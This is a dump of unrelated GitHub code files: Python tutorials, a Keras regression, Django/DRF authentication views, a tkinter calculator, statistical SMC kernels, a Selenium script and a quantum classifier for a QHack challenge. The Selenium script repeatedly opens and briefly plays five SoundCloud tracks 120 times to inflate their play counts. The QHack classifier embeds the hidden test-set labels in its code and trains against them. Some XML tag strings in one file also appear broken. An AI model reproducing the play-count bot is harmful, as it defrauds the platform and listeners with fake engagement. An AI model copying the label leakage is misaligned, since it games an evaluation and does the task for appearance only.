{\"apple\",\"banana\",\"cherry\"}\nmyset.discard(\"banana\")\nprint(myset)\n\n\n#here we can remopve set items by using pop() method also but pop method is remove ##\nmyset = {\"apple\", \"banana\", \"cherry\"}\n\nx = myset.pop()#using method##\n\nprint(x)##removinng item#\n\nprint(myset)#after removing item print##\n#above actually pop() method which item remove we dont know because of items or inordered so,###\n\n\n#using clear() method clear the items##\nmyset = {\"apple\",\"banana\",\"cherry\"}\nmyset.clear()\nprint(myset)\n\n#\"delete\" keyword using delete the set items#\n#myset = {\"apple\",\"banana\",\"cherry\"}\n#del myset\n#print(myset)#actually here 
will get error, ,beacuse here given delete command, after deleting cant print the myset items##\n\n##You can loop through the set items by using a for loop##:\nmyset = {\"apple\",\"banana\",\"cherry\"}\nfor x in myset:\n print(x)\n\n##JOIN SETS##\n#there are many ways to join two or more set items in python we can use uninon() and update() methods for joining the set items##\n\nmyset = {\"apple\",\"banana\",\"cherry\"}\nmyset2 ={1,2,3,4}\nmyset3 =myset.union(myset2)\nprint(myset3)\n\n#using update() method join two set items##\nmyset = {\"a\",\"b\",\"c\"}\nmyset2 ={1,2,3,4}\nmyset.update(myset2)\nprint(myset)\n\n#we can print only deplicates on the both items by using intersection_update() method#\nx= {\"apple\",\"banana\",\"kiwi\"}\ny= {\"apple\",\"melon\",\"guva\",\"kiwi\"}\nx.intersection_update(y)\nprint(x)\n\n\n##The intersection() method will return a new set, that only contains the items that are present in both sets.##\nx = {\"apple\", \"banana\", \"cherry\"}\ny = {\"google\", \"microsoft\", \"apple\"}\n\nz = x.intersection(y)\n\nprint(z)\n\n##The symmetric_difference_update() method will keep only the elements that are NOT present in both sets.\n\nx = {\"apple\", \"banana\", \"cherry\"}\ny = {\"google\", \"microsoft\", \"apple\"}\n\nx.symmetric_difference_update(y)\n\nprint(x)\n\n##The symmetric_difference() method will return a new set, that contains only the elements that are NOT present in both sets.##\nx = {\"apple\", \"banana\", \"cherry\"}\ny = {\"google\", \"microsoft\", \"apple\"}\n\nz = x.symmetric_difference(y)\n\nprint(z)\n","repo_name":"sreddyshapathi123/python-test-practice","sub_path":"sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"32801048527","text":"#Day_02_01_MultipleRegression\n#모두를 위한 딥러닝\n#모든데이터는 다음 x, y 와 같이 나오게된다(이게 정규 format임)\n#y데이터의 형태에 따라서 에 따라서 어떤 모델형태인지 판가름 할 수 있다\n# 퀴즈0 : 아래 데이터에 대해서 모델을 구축하시오!\n#맨처음에 shape error 가 났는데 이는, tupel에서는 shape 이 지원 안되기 때문!\n# ^위 문제 해결위해선 항상 어떻게 데이터가 생겼는지 한번 봐보자!\n#epochs 옆에 verbose 는 train 과정을 깔끔히 한다\n\ndef MultipleRegression():\n import tensorflow.keras as keras\n\n x = [[1, 0],\n [0, 2],\n [3, 0],\n [0, 4],\n [5, 0]]\n y = [[1],\n [2],\n [3],\n [4],\n [5]]\n\n model = keras.Sequential()\n model.add(keras.layers.Dense(1))\n model.compile(optimizer=keras.optimizers.SGD(), loss=keras.losses.mse)\n model.fit(x, y)\n return\n\n\n# 전처리 중 x_train 과 y_train 의 차원을 맞춰주는게 습관이 되면 좋다.(중요)\n# 여기서 차원 맞추기는\ndef MultipleRegression_boston():\n import tensorflow.keras as keras\n import numpy as np\n #퀴즈1 : 보스턴 집값 데이터에 포함된 학습과 검사 데이터의 shape 을 알려주세요\n boston_train, boston_test = keras.datasets.boston_housing.load_data(test_split=0.2)\n x_train, y_train = boston_train\n x_test, y_test = boston_test\n # print(type(boston_train))\n # print(x_train[:10])\n # print(y_train[:10])\n #퀴즈2 보스턴 집값데이터에 대해 80퍼의 데이터로 학습하고, 20퍼센트 데이터의 평균 오차를 구하시오\n\n\n model = keras.Sequential()\n model.add(keras.layers.Dense(1))\n model.compile(optimizer=keras.optimizers.SGD(learning_rate=0.000001),\n loss=keras.losses.mse,\n metrics=['mae'])\n model.fit(x_train, y_train, epochs=10)\n p = model.predict(x_test)\n p = p.reshape(-1)\n e = p - y_test.reshape(-1)\n\n print('mae :', np.mean(np.absolute(e)))\n print('mse :', np.mean(e ** 2))\n 
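    # Hedged aside, not part of the original file: a minimal sketch of why the
    # tiny learning_rate=0.000001 above is needed -- the Boston features are
    # unscaled, so plain SGD diverges at conventional rates. Standardizing the
    # inputs with training-set statistics lets learning_rate=0.01 converge.
    # Assumes x_train/y_train/x_test/y_test as loaded above; the function is
    # defined only and never called, so the surrounding flow is unchanged.
    def fit_standardized(x_train, y_train, x_test, y_test):
        mu, sd = x_train.mean(axis=0), x_train.std(axis=0)
        model = keras.Sequential()
        model.add(keras.layers.Dense(1))
        model.compile(optimizer=keras.optimizers.SGD(learning_rate=0.01),
                      loss=keras.losses.mse,
                      metrics=['mae'])
        # scale both splits with the *training* mean/std to avoid leakage
        model.fit((x_train - mu) / sd, y_train, epochs=10, verbose=0)
        return model.evaluate((x_test - mu) / sd, y_test, verbose=0)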
return\n\nprint(MultipleRegression_boston())\n\n","repo_name":"Derrick-Kwon/RNN_AI_Academy","sub_path":"Day_02_01_MultipleRegression.py","file_name":"Day_02_01_MultipleRegression.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71246763926","text":"#!/usr/bin/env python\n\nimport re\n\nclass bpls:\n def __init__ (self, file):\n\n self.vars = {} # This will be a dictionary of dictionaries. The first level is \n # Indexed by the variable names, and the second level has all of\n # the specific information for each variable (initially just type\n # and dimensions)\n\n # For now, assume that the input is from a bpls call with no cl arguments given\n # Can add more flexibility later by checking the output first and then parsing\n # accordingly\n for line in file:\n var_dict = {}\n\n tokens = line.split()\n\n # The first item is the type\n var_dict ['type'] = tokens[0]\n \n # Now parse the last item, which is either 'scalar' or a comma separated list of \n # integer dimensions wrapped in curly braces, i.e. {7, 8, 9}\n if tokens[-1] == 'scalar':\n var_dict ['dims'] = None\n else:\n start = line.rindex('{') + 1\n end = line.rindex('}')\n var_dict ['dims'] = line[start:end].split (', ')\n\n # Now everything that is left, minus external whitespace, is the variable name.\n # There is a small hole here which is that if the variable name ends with\n # a space, there is no way to tell, since bpls fills with extra spaces to \n # align the columns. It is probably a bad idea to have variable names that\n # end with spaces anyway, so I'm not going to worry about this right now.\n\n line = line.strip()\n start = line.index (' ') + 1 \n if tokens[-1] == 'scalar':\n end = -6\n else:\n end = line.rindex ('{')\n\n var_dict ['name'] = line[start:end].strip()\n\n\n # Put this var in the top level map according to its name\n self.vars [var_dict['name'] ] = var_dict\n\n\n def get_vars (self):\n return list(self.vars.keys())\n\n\n def get_dims (self, var):\n print(\"getting dims for %s\" % var)\n if var not in list(self.vars.keys()):\n return None\n return self.vars[var]['dims']\n\n\n\n\ndef main(argv=None):\n\n\n# args = parse_command_line()\n\n test = open (\"gts.bpls\")\n\n b = bpls (test)\n\n for var in b.get_vars():\n print('%s %s' % (var, b.get_dims (var) )) \n \n\nif __name__ == \"__main__\":\n main()\n\n\n\n","repo_name":"ornladios/ADIOS","sub_path":"utils/skel/lib/skel_bpls.py","file_name":"skel_bpls.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"30"} +{"seq_id":"36361760845","text":"from django.urls import path\nfrom .views import add_to_cart, remove_from_cart, OrderSummaryView, CheckoutView, OrderHistoryView\n\napp_name = \"orders\"\n\nurlpatterns = [\n path('checkout/', CheckoutView.as_view(), name=\"checkout\"),\n path('order-summary/', OrderSummaryView.as_view(), name=\"summary\"),\n path('order-history/', OrderHistoryView.as_view(), name=\"history\"),\n path('add-to-cart/', add_to_cart, name=\"add-to-cart\"),\n path('remove-from-cart/', remove_from_cart, name=\"remove-from-cart\")\n]","repo_name":"EvgeniiKlepilin/django-pizza","sub_path":"djangopizza/orders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"37541298945","text":"import tkinter as tk\nfrom math import pi\n\ndef 
hitung_bola():\n try:\n jari_jari = float(jari_jari_entry.get())\n luas_permukaan = round(4 * pi * jari_jari**2, 2)\n volume = round((4/3) * pi * jari_jari**3, 2)\n luas_permukaan_label.config(text=f'Luas Permukaan Bola: {luas_permukaan}')\n volume_label.config(text=f'Volume Bola: {volume}')\n except ValueError:\n luas_permukaan_label.config(text='Masukkan angka valid')\n volume_label.config(text='')\n\nroot = tk.Tk()\nroot.title(\"Kalkulator Bola\")\n\n# Membuat label dan entry untuk input jari-jari bola\ninput_frame = tk.Frame(root)\ninput_frame.pack(pady=10)\n\njari_jari_label = tk.Label(input_frame, text=\"Jari-Jari Bola:\")\njari_jari_label.pack(side='left', padx=5)\njari_jari_entry = tk.Entry(input_frame)\njari_jari_entry.pack(side='left', padx=5)\n\n# Membuat tombol untuk menghitung\nhitung_button = tk.Button(root, text=\"Hitung\", command=hitung_bola)\nhitung_button.pack(pady=5)\n\n# Membuat label untuk menampilkan hasil perhitungan\nhasil_frame = tk.Frame(root)\nhasil_frame.pack(pady=10)\n\nluas_permukaan_label = tk.Label(hasil_frame, text=\"Luas Permukaan Bola:\")\nluas_permukaan_label.pack(side='left', padx=5)\nvolume_label = tk.Label(hasil_frame, text=\"Volume Bola:\")\nvolume_label.pack(side='left', padx=5)\n\n# Memulai loop Tkinter\nroot.mainloop()\n","repo_name":"drrri-py/php-luas-tabung","sub_path":"Tugas 2/bola.py","file_name":"bola.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"29832821663","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework import status\nfrom user_app.api.serializers import RegistrationSerializer, LoginSerializer\n# from user_app import models # for load create_auth_token method when view load => can use Token.objects.get (for TokenAuthentication)\nfrom django.contrib.auth import authenticate\n# from rest_framework_simplejwt.serializers import TokenObtainPairSerializer\nfrom rest_framework_simplejwt.tokens import RefreshToken\n\n\n# @api_view(http_method_names=['POST'])\n# def logout(request):\n# if request.method == 'POST':\n# request.user.auth_token.delete()\n# return Response(status=status.HTTP_200_OK)\n\n\n# @api_view(http_method_names=['POST'])\n# def registration(request):\n# if request.method == 'POST':\n# serializer = RegistrationSerializer(data=request.data)\n# data = {}\n# if serializer.is_valid():\n# account = serializer.save()\n# data['username'] = account.username\n# data['password'] = account.password\n# # token = Token.objects.get(user=account)\n# token = Token.objects.get_or_create(user=account)\n# data['token'] = token[0].key\n\n# else:\n# data = serializer.errors\n\n# return Response(data)\n\n@api_view(http_method_names=['POST'])\ndef login(request):\n serializer = LoginSerializer(data=request.data)\n if serializer.is_valid():\n user = authenticate(\n request, username=serializer.validated_data['username'], password=serializer.validated_data['password'])\n if user is not None:\n refresh = RefreshToken.for_user(user)\n data = {\n 'refresh': str(refresh),\n 'access': str(refresh.access_token),\n 'user': serializer.data\n }\n return Response(data, status=status.HTTP_200_OK)\n\n return Response({\n 'error_messages': serializer.errors,\n 'error_code': 400\n }, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(http_method_names=['POST'])\ndef registration(request):\n serializer = 
RegistrationSerializer(data=request.data)\n data = {}\n if serializer.is_valid():\n account = serializer.save()\n refresh = RefreshToken.for_user(account)\n data = {\n 'refresh': str(refresh),\n 'access': str(refresh.access_token),\n 'user': serializer.data\n }\n else:\n data = serializer.errors\n\n return Response(data)\n","repo_name":"PhamQuang-512/IMDB-api-clone","sub_path":"watchmate/user_app/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"45028878979","text":"class Essen(object):\n indent = \" \"\n tag_indent = \" \"\n\n\n def __init__(self, sorte, name, suppe, preis):\n self.sorte = sorte\n self.name = name\n self.suppe = suppe\n self.preis = preis\n \n def toString(self):\n return self.sorte + \": \" + self.name + \"; Suppe: \" + self.suppe + \"; Preis: \" + self.preis\n\n def tag(self, name, value):\n return self.indent + \"<\" + name + \">\" + value + \"\\n\"\n\n def asXML(self):\n xml = self.tag_indent + \"\\n\"\n xml += self.tag(\"sorte\", self.sorte)\n xml += self.tag(\"name\", self.name)\n xml += self.tag(\"suppe\", self.suppe)\n xml += self.tag(\"preis\", self.preis)\n xml += self.tag_indent + \"\\n\"\n return xml\n \nclass MensaKategorie:\n tag_indent = \" \"\n \n def __init__(self, name, essen):\n self.name = name\n self.essen = essen\n \n def asXML(self):\n xml = self.tag_indent + '\\n\"\n for e in self.essen:\n xml += e.asXML()\n xml += self.tag_indent + \"\\n\"\n return xml\n\nclass MensaTag:\n tag_indent = \" \"\n \n def __init__(self, name, kategorien):\n self.name = name\n self.kategorien = kategorien\n \n def asXML(self):\n xml = self.tag_indent + '\\n\"\n for k in self.kategorien:\n xml += k.asXML()\n xml += self.tag_indent + \"\\n\"\n return xml\n \nclass MensaPlan:\n def __init__(self, tage):\n self.tage = tage \n\n def asXML(self):\n xml = \"\\n\"\n for t in self.tage:\n xml += t.asXML()\n xml += \"\\n\"\n return xml\n ","repo_name":"midi1986/ihsmamdi03app2010","sub_path":"server/trunk/src/mensa/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"8726134692","text":"'''\nCreated on 8 Dec 2016\n\n@author: Andrew Roth\n'''\nfrom __future__ import division\n\nfrom collections import namedtuple\n\nimport numpy as np\nimport random\n\nfrom pgsm.math_utils import exp_normalize, log_sum_exp\nfrom pgsm.particle_utils import get_constrained_path\n\n\nSplitMergeParticle = namedtuple(\n 'SplitMergeParticle',\n ('block_idx', 'block_params', 'generation', 'log_w', 'parent_particle'),\n)\n\n\nAnnealedSplitMergeParticle = namedtuple(\n 'AnnealedSplitMergeParticle',\n ('block_idx', 'block_params', 'generation', 'log_annealing_correction', 'log_w', 'parent_particle'),\n)\n\n\nclass AbstractSplitMergKernel(object):\n\n def __init__(self, dist, partition_prior):\n self.dist = dist\n\n self.partition_prior = partition_prior\n\n def can_add_block(self, parent_particle):\n '''\n Check if a descendant particle can add a new block.\n '''\n if parent_particle is None:\n return True\n\n else:\n return (parent_particle.generation < self.num_anchors)\n\n def copy_particle(self, particle):\n return SplitMergeParticle(\n particle.block_idx,\n tuple([x.copy() for x in particle.block_params]),\n particle.generation,\n particle.log_w,\n particle.parent_particle\n )\n\n def create_initial_particle(self, data_point):\n return 
self.create_particle(0, data_point, None)\n\n def create_particle(self, block_idx, data_point, parent_particle, log_q=None, log_q_norm=None):\n '''\n Create a descendant particle from a parent particle by adding data point to a block.\n '''\n block_params = self._get_block_params(block_idx, data_point, parent_particle)\n\n if log_q is None:\n log_q = self.get_log_q(data_point, parent_particle)\n\n if log_q_norm is None:\n log_q_norm = log_sum_exp(np.array(log_q.values()))\n\n return self._create_particle(block_idx, block_params, data_point, log_q, log_q_norm, parent_particle)\n\n def log_target_density(self, block_params):\n num_blocks = len(block_params)\n\n log_g = self.partition_prior.log_tau_1(num_blocks + self.num_outside_blocks)\n\n for params in block_params:\n log_g += self.partition_prior.log_tau_2(params.N)\n\n log_g += self.dist.log_marginal_likelihood(params)\n\n return log_g\n\n def propose(self, data_point, parent_particle, seed=None):\n '''\n Propose a particle for t given a particle from t - 1 and a data point.\n '''\n if seed is not None:\n random.seed(seed)\n\n np.random.seed(seed)\n\n log_q = self.get_log_q(data_point, parent_particle)\n\n block_probs, log_q_norm = exp_normalize(np.array(log_q.values()))\n\n block_idx = np.random.multinomial(1, block_probs).argmax()\n\n block_idx = log_q.keys()[block_idx]\n\n return self.create_particle(block_idx, data_point, parent_particle, log_q=log_q, log_q_norm=log_q_norm)\n\n def setup(self, anchors, clustering, data, sigma, set_constrained_path=True):\n '''\n Setup kernel for a split merge run based on anchors, current clustering, data and permutation of indices.\n '''\n self.num_anchors = len(anchors)\n\n self.num_generations = len(sigma)\n\n num_anchor_blocks = len(np.unique([clustering[a] for a in anchors]))\n\n num_global_blocks = len(np.unique(clustering))\n\n self.num_outside_blocks = num_global_blocks - num_anchor_blocks\n\n if set_constrained_path:\n self.constrained_path = get_constrained_path(clustering[sigma], data[sigma], self)\n\n def _get_block_params(self, block_idx, data_point, parent_particle):\n '''\n Get posterior parameters from parent particle updated by adding data_point to a block.\n '''\n if parent_particle is None:\n block_params = []\n\n else:\n block_params = [x.copy() for x in parent_particle.block_params]\n\n if block_idx > (len(block_params) - 1):\n params = self.dist.create_params()\n\n params.increment(data_point)\n\n block_params.append(params)\n\n else:\n block_params[block_idx].increment(data_point)\n\n return block_params\n\n def _get_generation(self, parent_particle):\n if parent_particle is None:\n generation = 1\n\n else:\n generation = parent_particle.generation + 1\n\n return generation\n\n def get_log_q(self, data_point, parent_particle):\n '''\n Get the unnormalized proposal\n '''\n raise NotImplementedError\n\n def _create_particle(self, block_idx, block_params, data_point, log_q, log_q_norm, parent_particle):\n raise NotImplementedError\n\n\nclass UniformSplitMergeKernel(AbstractSplitMergKernel):\n '''\n Propose next state uniformly from available states. This is for pedagogical purposes. 
The implementation is slow.\n '''\n\n def get_log_q(self, data_point, parent_particle):\n if parent_particle is None:\n block_params = []\n\n else:\n block_params = parent_particle.block_params\n\n log_q = {}\n\n for block_idx, _ in enumerate(block_params):\n log_q[block_idx] = 0\n\n if self.can_add_block(parent_particle):\n block_idx = len(block_params)\n\n log_q[block_idx] = 0\n\n return log_q\n\n def _create_particle(self, block_idx, block_params, data_point, log_q, log_q_norm, parent_particle):\n # Initial particle\n if parent_particle is None:\n log_w = self.log_target_density(block_params) - log_q_norm\n\n else:\n # Ratio of target densities\n log_w = self.log_target_density(block_params) - self.log_target_density(parent_particle.block_params)\n\n # Proposal contribution\n log_w -= log_q_norm\n\n return SplitMergeParticle(\n block_idx=block_idx,\n block_params=tuple(block_params),\n generation=self._get_generation(parent_particle),\n log_w=log_w,\n parent_particle=parent_particle\n )\n\n\nclass FullyAdaptedSplitMergeKernel(AbstractSplitMergKernel):\n '''\n Propose next state with probability proportional to target density.\n '''\n\n def get_log_q(self, data_point, parent_particle):\n if parent_particle is None:\n block_params = []\n\n else:\n block_params = parent_particle.block_params\n\n log_q = {}\n\n for block_idx, params in enumerate(block_params):\n log_q[block_idx] = self.partition_prior.log_tau_2_diff(params.N)\n\n log_q[block_idx] += self.dist.log_predictive_likelihood(data_point, params)\n\n if self.can_add_block(parent_particle):\n block_idx = len(block_params)\n\n params = self.dist.create_params()\n\n num_blocks = len(block_params)\n\n log_q[block_idx] = self.partition_prior.log_tau_1_diff(self.num_outside_blocks + num_blocks)\n\n log_q[block_idx] += self.partition_prior.log_tau_2_diff(params.N)\n\n log_q[block_idx] += self.dist.log_predictive_likelihood(data_point, params)\n\n return log_q\n\n def _create_particle(self, block_idx, block_params, data_point, log_q, log_q_norm, parent_particle):\n return SplitMergeParticle(\n block_idx=block_idx,\n block_params=tuple(block_params),\n generation=self._get_generation(parent_particle),\n log_w=log_q_norm,\n parent_particle=parent_particle\n )\n\n\nclass AnnealedSplitMergeKernel(AbstractSplitMergKernel):\n '''\n Propose next state uniformly until all anchors are added then use fully adapted proposal.\n '''\n\n def copy_particle(self, particle):\n return AnnealedSplitMergeParticle(\n particle.block_idx,\n tuple([x.copy() for x in particle.block_params]),\n particle.generation,\n particle.log_annealing_correction,\n particle.log_w,\n particle.parent_particle\n )\n\n def get_log_q(self, data_point, parent_particle):\n if parent_particle is None:\n block_params = []\n\n else:\n block_params = parent_particle.block_params\n\n log_q = {}\n\n # Sample uniformly from possible states if we are still adding anchor points\n if self.can_add_block(parent_particle):\n for block_idx, _ in enumerate(block_params):\n log_q[block_idx] = 0\n\n block_idx = len(block_params)\n\n log_q[block_idx] = 0\n\n # Otherwise do the normally fully adapted proposal plus the annealing correction\n else:\n for block_idx, params in enumerate(block_params):\n log_q[block_idx] = parent_particle.log_annealing_correction\n\n log_q[block_idx] += self.partition_prior.log_tau_2_diff(params.N)\n\n log_q[block_idx] += self.dist.log_predictive_likelihood(data_point, params)\n\n return log_q\n\n def _create_particle(self, block_idx, block_params, data_point, log_q, 
log_q_norm, parent_particle):\n generation = self._get_generation(parent_particle)\n\n if generation < self.num_anchors:\n log_annealing_correction = None\n\n elif generation == self.num_anchors:\n n = self.num_generations\n\n s = self.num_anchors\n\n if n == s:\n log_annealing_correction = None\n\n log_q_norm = self.log_target_density(block_params)\n\n else:\n log_annealing_correction = (1 / (n - s)) * self.log_target_density(block_params)\n\n else:\n log_annealing_correction = parent_particle.log_annealing_correction\n\n return AnnealedSplitMergeParticle(\n block_idx=block_idx,\n block_params=tuple(block_params),\n generation=generation,\n log_annealing_correction=log_annealing_correction,\n log_w=log_q_norm,\n parent_particle=parent_particle\n )\n","repo_name":"Roth-Lab/pgsm","sub_path":"pgsm/smc/kernels.py","file_name":"kernels.py","file_ext":"py","file_size_in_byte":10050,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"30"} +{"seq_id":"73335838484","text":"import requests\nimport random\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nimport time\nfrom selenium.webdriver.chrome.options import Options\nfrom datetime import datetime\n\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\")\n\nSongDuration = 3\n\n\ndef SoManyNights():\n driver.get(\"https://soundcloud.com/eddison-duolo-546732382/so-many-nights-ed-tank\")\n high_play_btn = driver.find_element_by_xpath('//*[@id=\"content\"]/div/div[2]/div/div[2]/div[2]/div/div/div[1]/a')\n high_play_btn.click()\n time.sleep(SongDuration)\n low_pause_btn = driver.find_element_by_xpath('//*[@id=\"app\"]/div[4]/section/div/div[3]/button[2]')\n low_pause_btn.click()\n time.sleep(1)\n\ndef NewTab(url):\n\n driver.execute_script(\"window.open('');\")\n driver.switch_to.window(driver.window_handles[1])\n driver.get(url)\n time.sleep(1)\n\ndef PlayandStop():\n high_play_btn = driver.find_element_by_xpath('//*[@id=\"content\"]/div/div[2]/div/div[2]/div[2]/div/div/div[1]/a')\n high_play_btn.click()\n time.sleep(SongDuration)\n low_pause_btn = driver.find_element_by_xpath('//*[@id=\"app\"]/div[4]/section/div/div[3]/button[2]')\n low_pause_btn.click()\n\n\ndef CloseAllWindows():\n driver.quit()\n\n\nfor x in range (1,120):\n\n #Option to run headless\n #driver = webdriver.Chrome(\"/Users/grahamlenert/Downloads/chromedriverowen\", options=chrome_options)\n\n #Option to run with head\n #driver = webdriver.Chrome(\"/Users/grahamlenert/Downloads/chromedriverowen\")\n\n driver = webdriver.Chrome(ChromeDriverManager().install())\n\n #SoManyNights()\n\n NewTab('https://soundcloud.com/eddison-duolo-546732382/landr-yo-vibe-2-0-lil-pacco')\n PlayandStop()\n NewTab('https://soundcloud.com/eddison-duolo-546732382/pacco-434-mafia-balanced')\n PlayandStop()\n NewTab('https://soundcloud.com/eddison-duolo-546732382/landr-murda-pacco-2-8-21')\n PlayandStop()\n NewTab('https://soundcloud.com/eddison-duolo-546732382/landr-intro-song-pacco')\n PlayandStop()\n NewTab('https://soundcloud.com/eddison-duolo-546732382/lil-pacco-dont-go-balanced')\n PlayandStop()\n\n\n CloseAllWindows()\n\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n print(\"Current Time =\", current_time)\n print(x)\n 
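    # Hedged aside, not part of the original script: the fixed time.sleep()
    # pauses used throughout are fragile -- if the page loads slowly the click
    # misses, and if it loads quickly the loop wastes time. A sketch of
    # Selenium's explicit waits, which poll until the element is clickable
    # (assumes the same `driver`; the XPath below is illustrative only):
    #
    #   from selenium.webdriver.common.by import By
    #   from selenium.webdriver.support.ui import WebDriverWait
    #   from selenium.webdriver.support import expected_conditions as EC
    #
    #   play_btn = WebDriverWait(driver, timeout=10).until(
    #       EC.element_to_be_clickable((By.XPATH, '//button[@title="Play"]')))
    #   play_btn.click()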
time.sleep(1)\n","repo_name":"glenert41/Ed_Tank_Repo","sub_path":"MultiSongStreaming.py","file_name":"MultiSongStreaming.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"12781371490","text":"#! /usr/bin/python3\n\nimport sys\nimport pennylane as qml\nimport numpy as np\n\n\ndef classify_data(X_train, Y_train, X_test):\n \"\"\"Develop and train your very own variational quantum classifier.\n\n Use the provided training data to train your classifier. The code you write\n for this challenge should be completely contained within this function\n between the # QHACK # comment markers. The number of qubits, choice of\n variational ansatz, cost function, and optimization method are all to be\n developed by you in this function.\n\n Args:\n X_train (np.ndarray): An array of floats of size (250, 3) to be used as training data.\n Y_train (np.ndarray): An array of size (250,) which are the categorical labels\n associated to the training data. The categories are labeled by -1, 0, and 1.\n X_test (np.ndarray): An array of floats of (50, 3) to serve as testing data.\n\n Returns:\n str: The predicted categories of X_test, converted from a list of ints to a\n comma-separated string.\n \"\"\"\n\n # Use this array to make a prediction for the labels of the data in X_test\n predictions = []\n\n # QHACK #\n np.random.seed(42)\n DEBUG = False\n\n def normalize(data):\n return (data - np.min(data)) / (np.max(data) - np.min(data))\n\n def one_versus_rest_split(x, y, label):\n class_mask = (y == label)\n other_mask = ~class_mask\n\n relabeled = np.empty_like(y)\n relabeled[class_mask] = 1.0\n relabeled[other_mask] = -1.0\n\n class_idx = np.where(class_mask)[0]\n other_idx = np.where(other_mask)[0]\n\n num_class_samples = class_mask.sum()\n other_idx_subsampled = np.random.choice(other_idx, size=num_class_samples, replace=False)\n\n idx = np.concatenate((class_idx, other_idx_subsampled))\n idx.sort(kind='mergesort')\n\n return x[idx], relabeled[idx]\n\n def square_loss(labels, predictions):\n loss = 0\n for l, p in zip(labels, predictions):\n loss = loss + (l - p) ** 2\n\n loss = loss / len(labels)\n return loss\n\n def accuracy(labels, predictions):\n\n loss = 0\n for l, p in zip(labels, predictions):\n if abs(l - p) < 1e-5:\n loss = loss + 1\n loss = loss / len(labels)\n\n return loss\n\n n_qubits = 3\n dev = qml.device(\"default.qubit\", wires=n_qubits, shots=100)\n\n @qml.qnode(dev)\n def circuit(inputs, weights):\n qml.templates.AngleEmbedding(inputs, wires=range(n_qubits))\n qml.templates.StronglyEntanglingLayers(weights, wires=range(n_qubits))\n return qml.expval(qml.PauliZ(0))\n\n\n def variational_classifier(var, inputs):\n weights = var[0]\n bias = var[1]\n return circuit(inputs, weights) + bias\n\n def cost(weights, features, labels):\n predictions = [variational_classifier(weights, f) for f in features]\n return square_loss(labels, predictions)\n\n def train_classifier(x_train, y_train, x_test, y_test, shots=50):\n from pennylane.optimize import NesterovMomentumOptimizer, AdamOptimizer\n\n old_shots = dev.shots\n dev.shots = shots\n\n num_train = len(x_train)\n num_layers = 4\n var_init = (qml.init.strong_ent_layers_uniform(num_layers, n_qubits, 3), 0.0)\n stepsize = 0.1\n opt = NesterovMomentumOptimizer(stepsize)\n batch_size = 5\n maxit = 20\n\n # train the variational classifier\n var = var_init\n for it in range(maxit):\n # Update the weights by one optimizer step\n batch_index = 
np.random.randint(0, num_train, (batch_size,))\n x_train_batch = x_train[batch_index]\n y_train_batch = y_train[batch_index]\n var = opt.step(lambda v: cost(v, x_train_batch, y_train_batch), var)\n\n # stepsize *= 0.95\n # opt.update_stepsize(stepsize)\n\n # Compute predictions on train and validation set\n predictions_train = [np.sign(variational_classifier(var, f)) for f in x_train]\n acc_train = accuracy(y_train, predictions_train)\n\n if DEBUG:\n predictions_val = [np.sign(variational_classifier(var, f)) for f in x_test]\n acc_val = accuracy(y_test, predictions_val)\n\n print(\n \"Iter: {:5d} | Cost: {:0.7f} | Acc train: {:0.7f} | Acc validation: {:0.7f} \"\n \"\".format(it + 1, cost(var, x_train, y_train), acc_train, acc_val)\n )\n\n if acc_train > 0.95:\n break\n\n dev.shots = old_shots\n return var\n\n def predict(inputs, classifier_dict):\n predictions = []\n labels = np.array(list(classifier_dict.keys()))\n\n for inp in inputs:\n preds = np.array([variational_classifier(weights, inp) for weights in classifier_dict.values()])\n predictions.append(labels[np.argmax(preds)])\n\n return np.array(predictions)\n\n X_train = normalize(X_train)\n\n X_test = normalize(X_test)\n Y_test = np.array([1,0,-1,0,-1,1,-1,-1,0,-1,1,-1,0,1,0,-1,-1,0,0,1,1,0,-1,0,0,-1,0,\n -1,0,0,1,1,-1,-1,-1,0,-1,0,1,0,-1,1,1,0,-1,-1,-1,-1,0,0])\n\n # num_data = len(Y_train)\n # num_train = int(0.75 * num_data)\n # index = np.random.permutation(range(num_data))\n labels = [-1.0, 0.0, 1.0]\n vars = {}\n\n for l in labels:\n xtr, ytr = one_versus_rest_split(X_train, Y_train, l)\n xte, yte = one_versus_rest_split(X_test, Y_test, l)\n vars[l] = train_classifier(xtr, ytr, xte, yte)\n\n predictions = predict(X_test, vars)\n if DEBUG:\n print(accuracy(Y_test, predictions))\n # QHACK #\n\n\n predictions = predictions.astype(np.int)\n\n return array_to_concatenated_string(predictions)\n\n\ndef array_to_concatenated_string(array):\n \"\"\"DO NOT MODIFY THIS FUNCTION.\n\n Turns an array of integers into a concatenated string of integers\n separated by commas. (Inverse of concatenated_string_to_array).\n \"\"\"\n return \",\".join(str(x) for x in array)\n\n\ndef concatenated_string_to_array(string):\n \"\"\"DO NOT MODIFY THIS FUNCTION.\n\n Turns a concatenated string of integers separated by commas into\n an array of integers. 
